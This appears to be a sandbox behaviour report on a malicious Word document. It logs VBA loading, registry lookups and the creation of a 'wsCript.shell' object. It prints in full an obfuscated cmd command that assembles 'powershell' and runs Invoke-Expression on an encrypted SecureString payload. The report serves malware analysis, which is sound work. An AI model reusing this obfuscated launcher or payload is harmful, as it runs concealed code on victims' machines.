| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x76e05f08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x76e02b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x76dfab64 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x76e05c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x76dfa730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayDevicesA, address_out = 0x76dfa5b4 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = oleaut32.dll, base_address = 0x7fefe910000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = DispCallFunc, address_out = 0x7fefe912270 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7fefe91a550 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7fefe9a20d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7fefe99dbd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7fefe915c90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7fefe916330 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7fefe9366c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7fefe914710 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7fefe9148f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7fefe94b640 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7fefe94b360 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7fefe952640 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7fefe9358a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7fefe935820 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7fefe94af20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7fefe96a0c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7fefe9a2160 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7fefe935af0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7fefe935a90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7fefe935a60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7fefe935a30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7fefe9160b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7fefe913e90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7fefe969f80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormat, address_out = 0x7fefe999b20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7fefe999aa0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7fefe999990 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7fefe999890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7fefe999770 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7fefe97b8d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMonthName, address_out = 0x7fefe97b800 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAdd, address_out = 0x7fefe9948e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAnd, address_out = 0x7fefe999470 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCat, address_out = 0x7fefe9996a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDiv, address_out = 0x7fefe992fe0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarEqv, address_out = 0x7fefe999cf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarIdiv, address_out = 0x7fefe998ff0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarImp, address_out = 0x7fefe999c00 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMod, address_out = 0x7fefe998e60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMul, address_out = 0x7fefe993690 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarOr, address_out = 0x7fefe9992d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarPow, address_out = 0x7fefe992e80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarSub, address_out = 0x7fefe993f90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarXor, address_out = 0x7fefe9991a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAbs, address_out = 0x7fefe977c30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFix, address_out = 0x7fefe977a60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarInt, address_out = 0x7fefe977890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNeg, address_out = 0x7fefe977ea0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNot, address_out = 0x7fefe999600 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarRound, address_out = 0x7fefe9776a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCmp, address_out = 0x7fefe9983f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecAdd, address_out = 0x7fefe943070 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecCmp, address_out = 0x7fefe94d700 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarBstrCat, address_out = 0x7fefe94d890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7fefe92caf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7fefe938a00 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-03-29 15:42:46 (Local Time) |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 105, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Module | Get Address | module_name = Unknown module name, address_out = 0x7fee27ffcd0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-03-29 15:42:46 (Local Time) |
|
2 | |
| System | Get Time | type = Local Time, time = 2018-03-29 15:42:47 (Local Time) |
|
2 | |
| System | Get Cursor | x_out = 825, y_out = 125 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-03-29 15:42:47 (Local Time) |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-03-29 15:42:47 (Local Time) |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| System | Get Cursor | x_out = 825, y_out = 125 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-03-29 15:42:47 (Local Time) |
|
4 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = VbaCapability, data = 105 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 714, address_out = 0x7fee32e3a44 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 712, address_out = 0x7fee3359db0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 632, address_out = 0x7fee313d6f0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 608, address_out = 0x7fee313ae28 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 716, address_out = 0x7fee33124c8 |
|
1 | |
| COM | Get Class ID | cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = wsCript.shell |
|
1 | |
| COM | Create | interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Process | Create | process_name = Cmd uokQarPiXkRo TulEVCqHjGVGZiAowD qTzHstoNw & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %XGUfViTjCEjwSVO%=ZHGHTLTuB&&set %DAXAIPvZQicL%=p&&set %vwiYoBzE%=o^w&&set %NwmclOIWlPPfrXs%=YtuPEnjH&&set %mESEbjHwWp%=!%DAXAIPvZQicL%!&&set %zkOiRaLmZdHljEQ%=XajFzihkNzuSY&&set %YJwaSiYTQtqK%=e^r&&set %pflmiDDErkSdkk%=!%vwiYoBzE%!&&set %fTvSPumjwc%=s&&set %iwaQfiAAaFLEdGO%=GdUcFsiGa&&set %iwpiikIEcScOE%=he&&set %zRBwSiVAaTKc%=ll&&!%mESEbjHwWp%!!%pflmiDDErkSdkk%!!%YJwaSiYTQtqK%!!%fTvSPumjwc%!!%iwpiikIEcScOE%!!%zRBwSiVAaTKc%! "inVOKE-EXPResSION(([runtiMe.InTeRoPSErVIceS.MArsHAl]::PtRtOsTRiNgbstr([runtimE.INtEROPSerVIcEs.MarsHAl]::seCuRestRiNgTobstR($('76492d1116743f0423413b16050a5345MgB8AG0AdABWAHUAYwA1AFUAWQB2ADgAZgBOAGUASgBHAE4AegAwAFUATQBnAEEAPQA9AHwAYgAyAGIANQBiADgAMABkADMAYQBjAGIAYQA2ADgAOQAxADEAMAA4AGEAZQBjADEAZQBmADkANgAwADUAOQBjAGQANwA1AGYAOAA1ADIAMgAzAGYAMABlAGQAOQA2ADcAZgA1ADEAMAAzADQAZAA0ADAAZgBlADQANAA4ADAANAA1AGIAZQAxADMAMQAwAGYAMgA0ADgAZQA4ADUAZgAxADIAOAAyAGMAOQAwADkANAAzADUANgBlAGEAYwAzADIAOQBhADIANgAxAGEAOQBjAGYANQAyAGUAOABiAGIANQBiADkAMwA3AGYAYQA4ADkAOQBmADYAOAA2AGIANwBiADQAYwA1AGIAOQBiADQAMQA5AGUAZQAwADgAYgAzADEANQA1ADEAZQA3ADkAZABkADQAMQAzADgAZQBhADAAMgA2AGQAZABhADEAOABkAGIAMQBiADEAOABhAGEAMAA2AGIAYwA2AGIAMwA3AGQAZgA4AGYAOQAzAGIANwBjADIAMgAyAGMAOABlADIAMgAyAGUAOAA0AGYAYwBjADMAYwA3ADAAZQAxADUAYQA4ADAAMQBhADIAMwA0ADYAYwBmAGMAYwBjAGQAMwBmADgAMQBiAGYAZABkADAAMwBmADgANwBmAGIANABlADkANQBhADcAMQA0ADQAZAA5ADcANQAzAGQANQBiAGMAOAAyAGEAYwAwADAAMwA5ADcAYwA2AGMANAAwADIAZAAzADEAYQAxADcAYQAyADQAYgBlADQAZQA4ADcAZQBmAGMAYgBiADcAMAAzAGUANAA1ADMAZgBjADAAZQAwAGEAZQAxAGEAOAA1ADEAYgA4AGUAMABhADQAOAA1AGMANgA1AGUAZAA2ADUAMwAzAGUAOQAwADMAYgA2ADMAZQBlAGQAZQA2ADEANQAwADkAZgBmAGQANgA3ADQANAA2AGEAMAA3AGQAZgBjADMAZAA1AGIAYgA1ADkAZgBjAGMAYgBlADgAOAAxAGUAOQBiAGEAZgBiADQAYwBiADEAOQA3ADcAYQBhAGMAZgBlAGQAMAA5AGUAYQAxAGYAMQAyAGIANwAwADEAMABiAGYAMwA1ADQAMQBiAGMAOQBiADIAZQA5AGIANABkADYAZAA5ADYAZgA3ADYAYgA1ADQAMQBlADQANQBmADYAMQA0ADcANQBlADEAZQBiADgAMwA3AGQANgA0ADUAZgAyADUAMwA1ADAAYQA1AGIANgA5ADUANwAyAGQAZQA0AGIAYwA1AGYAYQBiADIANwBmADgAMABmADkAOABiAGMANQA4ADcANABkAGEANgAzAGUAMwBhADgAMQAzADEANwBkADkAOABjADAAZQA1ADUAYQA2ADIAYwAxADAANQBjADUAZgBhADkAZAA3AGEANgA4ADcAMQA2ADgAYwBmAGEAMgBkADkAYgA4AGIAYgAyAGQAOAA0ADQAZQAyADYAMAA3AGEAMQAyADQAMABmADMAYgBhAGMAZABjAGIAYwBhAGEANwBjADkAOQA3ADYANQBhADUAYgBjADMANwBkADQAZgBiADkAMgBkAGIAMAAzADkANAAzADUANwAxADgAZgAwADMAOAAxAGYAMwBjADcAYQA5ADAAMAA5ADAAMgAyAGEAZAAwAGUAOAA2ADMANwBlAGQAYQA1ADcAOABmAGEANwA2ADkANgAxADQAYgBlAGQAYQAzADIAZgA5AGUAMgA0ADIAMQA2ADgAMwBjADgANQA1ADkAOQAxADIANgA5ADYAMwA2ADgAYgA1ADAAOQBhADYANABhADYAMQBiADkAMgA5AGQAYgBjADkAYwBhADkANgA5ADcAMAAzAGMANQBhADIAMAA5AGEAYwBiADYAZAAyADUAZQAxADcAMABjAGEANgBkAGYAYwBkADAAYwBhAGUAMABjAGQAYgAzAGQAZABjAGYAZAA2AGYANQAxADQAYQA0AGYANAAyAGYAYQAxADEANgBkADQAYwA0ADgAOABmAGQAOAAwAGEAZgA3AGUAOAAxADIAYgBiAGMAMwA2ADQAMABkADAAMQAyAGIAZABhADgAYQBmADIANAAyADMAOABjAGUANAAyADMAYQBjAGYANgA0AGEAYwBjAGIAMwAxAGUANQBmADEANwBmAGQAYQBmAGIAZgBiADcAYwAxADUAYwBiAGUAMABmADkANwBiADIAOQAyAGIAYwAxAGMAYgAwADEAMgA5ADMAYQBhAGIANwA4AGYAYQA5ADEAMQBiADkAYwBiAGQAYQAwAGMAMwBkAGQAZABmADkAOQA2ADMAMQBmADYAYwA5ADQANgBkAGEANgBlAGIAYQBmADQAMQAzADIAMwA4AGMANQA1AGYAMgAzAGYAZAAxADIAYQAzAGYAMAA3AGIAOABkAGYANwA5ADkAZgAyADUAMwAxAGIAOQA3ADYANQA1AGIANABlAGIAMAA3ADMAMwBmAGYANwA0AGYAOQBlADgAZQBkAGQANgA2ADcAOABmADcAZABmADYAYgAzADIAMwA0ADEAMQA4ADkAYwBmADMAZQBmADIANQAwADYAYwAyAGUAZgA4AGQAOQBhADcAMAA0ADkANwBmAGIANQBjADUANwAzADMAZgBlADcAZAAyAGMAMQBhADgANgA0ADgAZQBmAGMAYQAzADQAMwBkADUAMgA5AGYANwA5AGUANQAwADkAZQA5ADIAZQAyADMAMQAyADkANQA2AGEAZABhADQAZAAyADIAZAAxAGUAOAAzAGQANwBlAGMAZgA0ADMANQA4AGUAZgBjAGMANAA2ADcAYgA5ADYAOQAyAGYAMgAxAGIAOQA2ADkAOQA3ADYAZgAwADUAZgBhAGUANABiADgANQA4ADQAMgA0ADMAMABmAGIAZAA4ADAANgAzAGUAOAAxAGYAYgA3AGUAMQA4AGUANgA5ADEAZgBiADUAYQA1AGMAOABjADAAMwBjAGIAOQA4ADUANABlADkAOAA2ADMAZgBjAGMAYwBkAGEAYwA0ADMAZAA2ADMAZQAyADcAYwAyAGIANABlAGEAMQBlAGMANwAyADkAOABjADcAYwAxADUAZgAxADYANgBkADkAYwA1AGMAYgBiADkAOQBjAGQAYwA2AGIANgBhADQAYwA1ADMAMQAzAGUAMAAzAGEAYQA3AGEANgA2AGUAZQBmADMAYQBmADUANwA0ADUAZgA1ADMAMAAwADUAZAA4ADQAOQA0AGMAYwBlADQAYgA1ADQANAA0AGEAMQA1ADMAOQBiADUAZAA5ADQAMQBlAGUANwAyAGUAOQA3ADQANQBiAGEANwA4ADcANQAzADMANwA1ADMAYQBmAGQAYwBiADMAYwA2AGMAOAAxAGMAYwA5AGUAOAAwAGMAZQBmAGEANgA3AGIAMQAyAGEAMQA5AGEANwA2AGIAMwA4AGUAMgA1AGYANQBmADgAZAA2ADcANgBkAGQAMAA0ADMAMAA3ADkAOAA3ADQAMwAzADAAYgAwADgAZgBhADQAMgAyADcAZgAwADIAYgA2ADgAOAA1ADgAZAA2AGEAYQAyAGIAOABiADMANAAzAGIAOQA1ADAAMAAyAGQANQBiADAAMgBkADUAYgA3ADcAZQAxADIAOQAwADcANwAwAGUAMgBiADcANAAxAGYAZgA3ADkAMwBjADEAOAAxADEAOQA3AGMAZgBiADIANgA4ADEAZgBkADIAOABmADcAZQA3ADUAOAA5AGQAYwA3ADUAZAAzADAAOQBhAGIANwBmAGIAMQBlAGIAZgAxADEAYQBiADMAZQAxAGUAMAA4ADEANwA2ADAAOQAyAGIAMwBlADAAMABhADIAOQBiADUAYgBhADkAYwA0AGUAOQA0ADcAZgAzADYAZQAyADAAYwBkADEAMgA4ADIAMABlAGMAZgAzADIANwBkAGIAOQBjADYAYwA5ADQAYwAzADIAMgBkADcAZgA2AGEAMgA4ADEAOAAyADIAZAA0ADMAMgBmADUAMABlADkAYwAwAGUANwBjAGIANwAwAGMAYgAzAGMAZQBiAGQAYgBiAGUAYwA3ADQANwA3ADIAMwAzADUA' | CoNveRTto-seCURestrING -Ke (222..207)) ) ))) |
|
1 | |
| System | Get Cursor | x_out = 471, y_out = 294 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 |
|
1 | |
| Registry | Open Key | reg_name = win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 |
|
1 | |
| Registry | Open Key | reg_name = win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| System | Get Time | type = Ticks, time = 180805 |
|
9 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 714, address_out = 0x7fee32e3a44 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 712, address_out = 0x7fee3359db0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 608, address_out = 0x7fee313ae28 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 716, address_out = 0x7fee33124c8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 632, address_out = 0x7fee313d6f0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 714, address_out = 0x7fee32e3a44 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 712, address_out = 0x7fee3359db0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 608, address_out = 0x7fee313ae28 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 716, address_out = 0x7fee33124c8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2fd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 632, address_out = 0x7fee313d6f0 |
|
1 |
Process #2: cmd.exe
126
0
| Information | Value |
